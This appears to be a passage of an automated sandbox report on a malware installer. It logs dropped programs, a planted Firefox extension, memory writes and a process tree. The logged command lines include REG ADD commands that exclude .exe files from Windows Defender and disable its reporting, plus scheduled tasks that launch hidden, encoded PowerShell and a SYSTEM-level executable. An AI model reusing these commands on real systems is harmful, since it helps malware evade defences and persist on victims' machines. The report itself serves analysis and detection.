File created C:\Program Files (x86)\Reg Organizer\is-SUQ5L.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-1V9A0.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-FH67E.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-SJL9F.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-9EDC2.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\ScanRename.exe C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-GLMA5.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-GSAUU.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-7Q57V.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-85F56.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\XxxUzwYQU\gZNljN.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-D660G.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-VS512.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-51CA6.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-POECU.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\iwOiVBtjWoVYUMW.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 692 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
PID 1476 wrote to memory of 692 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
PID 1476 wrote to memory of 692 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
PID 1476 wrote to memory of 692 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
PID 1476 wrote to memory of 1996 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
PID 1476 wrote to memory of 1996 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
PID 1476 wrote to memory of 1996 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
PID 1476 wrote to memory of 1996 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
PID 1996 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1596 wrote to memory of 300 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1596 wrote to memory of 300 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1596 wrote to memory of 300 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1596 wrote to memory of 300 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1492 wrote to memory of 796 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe

"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp" /SL5="$70126,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe

C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe

C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe /sid=3 /pid=449

C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe

C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe /S /site_id=757674

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp

"C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp" /SL5="$2023E,990754,54272,C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp" /SL5="$30242,2567431,54272,C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gSRPiGqxS" /SC once /ST 17:12:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename"

C:\Program Files (x86)\ScanRename\ScanRename.exe

"C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

"C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gSRPiGqxS"

C:\Windows\system32\taskeng.exe

taskeng.exe {462DC29C-DE10-415F-9641-E7C058AA9F44} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "ScanRename.exe" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gSRPiGqxS"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe\" bt /site_id 757674 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Windows\system32\cmd.exe

